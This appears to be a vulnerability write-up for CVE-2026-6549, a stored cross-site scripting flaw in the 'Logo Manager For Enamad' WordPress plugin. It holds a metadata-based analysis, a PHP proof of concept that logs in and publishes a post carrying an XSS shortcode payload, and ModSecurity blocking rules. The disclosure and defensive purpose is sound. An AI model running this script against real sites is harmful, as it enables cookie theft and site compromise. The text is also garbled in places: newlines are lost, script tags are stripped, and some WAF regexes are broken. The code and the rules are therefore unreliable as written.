CVE-2026-6549: Logo Manager For Enamad <= 0.7.4 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'title' Shortcode Attribute (logo-manager-for-enamad)

{
“analysis”: “Atomic Edge analysis of CVE-2026-6549 (metadata-based):nnThis vulnerability is a Stored Cross-Site Scripting (XSS) flaw in the Logo Manager For Enamad plugin for WordPress, affecting versions up to and including 0.7.4. The issue allows authenticated contributors and above to inject arbitrary web scripts via the ‘title’ attribute of three shortcodes: `vc_enamad_namad`, `vc_enamad_shamed`, and `vc_enamad_custom`. The CVSS score is 6.4 (Medium), with a vector of AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N, indicating network exploitability, low attack complexity, required authentication, and no user interaction needed for script execution.nnThe root cause stems from insufficient input sanitization and output escaping on user-supplied shortcode attributes. The plugin likely registers shortcodes that accept a ‘title’ attribute without properly filtering or encoding the value before rendering it on the page. Based on the CWE-79 classification and the description, the plugin probably retrieves the ‘title’ value directly from the shortcode parameters and echoes it into the HTML output without using `esc_attr()` or similar WordPress escaping functions. This conclusion is inferred from the metadata; no code diff was available for confirmation.nnExploitation requires an attacker to have at least Contributor-level access in WordPress. The attacker creates or edits a post, page, or any content that supports shortcodes, and inserts one of the vulnerable shortcodes (e.g., `[vc_enamad_namad title=”alert(document.cookie)”`). The ‘title’ attribute value is stored in the database upon post save. When any user, including site administrators or visitors, views the page containing the malicious shortcode, the injected script executes in their browser. No additional user interaction is required beyond viewing the page.nnA proper fix must sanitize the ‘title’ attribute using `sanitize_text_field()` or a similar function when processing shortcode attributes, and escape the output with `esc_attr()` before rendering. WordPress shortcode API typically passes attributes through `shortcode_atts()` which does not automatically sanitize or escape. The plugin should implement these security measures in the shortcode handler functions for all three vulnerable shortcodes. Since no patched version exists, users should disable the plugin until a fix is released.nnIf exploited, this vulnerability allows authenticated attackers to execute arbitrary JavaScript in the context of any user viewing the compromised page. This could lead to session hijacking, credential theft, defacement, or redirection to malicious sites. The impact is amplified by the stored nature of the XSS, as the payload persists until the malicious content is removed. The CVSS Confidentiality and Integrity impact are both rated Low, but in practice, an attacker could leverage the script to perform administrative actions if a logged-in administrator views the page.”,
“poc_php”: “// Atomic Edge CVE Research – Proof of Concept (metadata-based)n// CVE-2026-6549 – Logo Manager For Enamad $username,n ‘pwd’ => $password,n ‘wp-submit’ => ‘Log In’,n ‘redirect_to’ => $target_url . ‘/wp-admin/’,n ‘testcookie’ => 1n);nn$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $login_url);ncurl_setopt($ch, CURLOPT_POST, 1);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));ncurl_setopt($ch, CURLOPT_COOKIEJAR, ‘/tmp/cve_cookies.txt’);ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘/tmp/cve_cookies.txt’);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);ncurl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);n$response = curl_exec($ch);ncurl_close($ch);nn// Check if login succeeded by attempting to access admin dashboardn$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $target_url . ‘/wp-admin/’);ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘/tmp/cve_cookies.txt’);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);ncurl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);n$response = curl_exec($ch);n$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);ncurl_close($ch);nnif ($http_code != 200) {n die(“Login failed. Check credentials or target URL. HTTP code: $http_code\n”);n}nn// Step 2: Get a nonce for creating a new post via WP REST APIn// We use REST API to avoid needing admin-ajax nonce extraction (simpler PoC)n$rest_nonce_url = $target_url . ‘/wp-json/wp/v2/users/me’;n$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $rest_nonce_url);ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘/tmp/cve_cookies.txt’);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);ncurl_setopt($ch, CURLOPT_HTTPHEADER, array(‘X-WP-Nonce: 1’)); // Dummy to get noncencurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);ncurl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);n$response = curl_exec($ch);ncurl_close($ch);nn// For simplicity, we directly use WP Admin new post form with noncen// Fetch the post-new.php page to extract the _wpnoncen$new_post_url = $target_url . ‘/wp-admin/post-new.php’;n$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $new_post_url);ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘/tmp/cve_cookies.txt’);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);ncurl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);n$response = curl_exec($ch);ncurl_close($ch);nn// Extract _wpnonce for creating postsnpreg_match(‘//’, $response, $matches);nif (empty($matches[1])) {n // Try alternate regex patternsn preg_match(‘/name=”_wpnonce” value=”([a-f0-9]+)”/’, $response, $matches);n}n$nonce = isset($matches[1]) ? $matches[1] : ”;nnif (empty($nonce)) {n die(“Failed to extract post creation nonce. Manual intervention required.\n”);n}nn// Step 3: Create a new post containing the malicious shortcoden// The ‘title’ attribute will contain the XSS payloadn// We use [vc_enamad_namad] as example; any of the three shortcodes worksn$xss_payload = ‘”‘ . ” onclick=’alert(document.cookie)'” . ‘ style=position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999’; // Using event handler for reliable execution without breaking HTMLn// More direct: just use a script tagn$xss_payload = “alert(1)”;nn$post_data = array(n ‘post_title’ => ‘CVE Test Post’,n ‘post_content’ => ‘[vc_enamad_namad title=”‘ . $xss_payload . ‘” other_attr=”ignored”]’,n ‘post_status’ => ‘publish’,n ‘post_type’ => ‘post’,n ‘_wpnonce’ => $nonce,n ‘action’ => ‘post-quickpress-publish’, // Not used, but we include standard fieldsn);nn// Use admin-ajax to publish via quickpress (older WP) or direct RESTn// Prefer REST API for reliabilityn$rest_create_url = $target_url . ‘/wp-json/wp/v2/posts’;nn// Get REST nonce from cookies or headern$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $target_url . ‘/wp-admin/admin-ajax.php?action=rest-nonce’);ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘/tmp/cve_cookies.txt’);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);ncurl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);n$rest_nonce_response = curl_exec($ch);n$rest_nonce = trim($rest_nonce_response);ncurl_close($ch);nnif (empty($rest_nonce)) {n die(“Failed to get REST nonce.\n”);n}nn$json_data = json_encode(array(n ‘title’ => ‘CVE Test Post via REST’,n ‘content’ => ‘[vc_enamad_namad title=”‘ . $xss_payload . ‘”]’,n ‘status’ => ‘publish’n));nn$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $rest_create_url);ncurl_setopt($ch, CURLOPT_POST, 1);ncurl_setopt($ch, CURLOPT_POSTFIELDS, $json_data);ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘/tmp/cve_cookies.txt’);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);ncurl_setopt($ch, CURLOPT_HTTPHEADER, array(n ‘Content-Type: application/json’,n ‘X-WP-Nonce: ‘ . $rest_noncen));ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);ncurl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);n$response = curl_exec($ch);n$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);ncurl_close($ch);nn$response_data = json_decode($response, true);nif ($http_code == 201 && isset($response_data[‘id’])) {n $post_id = $response_data[‘id’];n echo “PoC successful. Created post ID $post_id with XSS payload.\n”;n echo “Visit: ” . $target_url . ‘/?p=’ . $post_id . ” to trigger XSS.\n”;n} else {n echo “Failed to create post via REST. HTTP code: $http_code\n”;n if (isset($response_data[‘message’])) {n echo “Error message: ” . $response_data[‘message’] . “\n”;n }n echo “Response: ” . print_r($response_data, true) . “\n”;n}nn// Clean up cookie filenunlink(‘/tmp/cve_cookies.txt’);n”,
“modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-6549 (metadata-based)n# Blocks stored XSS via vulnerable shortcodes in Logo Manager For Enamadn# Matches on WP REST API requests that inject script content in ‘content’ or ‘title’ fieldsn# This rule targets the exploitation vector: unauthenticated POST to /wp-json/wp/v2/posts or pagesn# Since the vulnerable shortcode is processed server-side, we block XSS patterns in POST body contentnSecRule REQUEST_URI “@beginsWith /wp-json/wp/v2/” \n “id:20261994,phase:2,deny,status:403,chain,msg:’CVE-2026-6549 – Logo Manager For Enamad Stored XSS’,severity:’CRITICAL’,tag:’CVE-2026-6549′”n SecRule REQUEST_METHOD “@streq POST” “chain”n SecRule ARGS_POST:content “@rx (?i)]*>[^<]*|]+on\w+\s*=\s*[‘”‘”].*[‘”‘”].*>” “chain”n SecRule ARGS_POST:content “@rx \[vc_enamad_(?:namad|shamed|custom)” “t:none”nn# Alternative rule targeting admin-ajax.php with directly crafted shortcode submissionnSecRule REQUEST_URI “@streq /wp-admin/admin-ajax.php” \n “id:20261995,phase:2,deny,status:403,chain,msg:’CVE-2026-6549 – Logo Manager For Enamad Stored XSS (AJAX)’,severity:’CRITICAL’,tag:’CVE-2026-6549′”n SecRule ARGS_POST:action “@rx ^(?:post-quickpress-publish|inline-save|wp_ajax_.*)$” “chain”n SecRule ARGS_POST:post_content “@rx \[vc_enamad_(?:namad|shamed|custom)[^\]]*title\s*=\s*[‘”‘”][^'”‘\]]*<script" "t:none""
}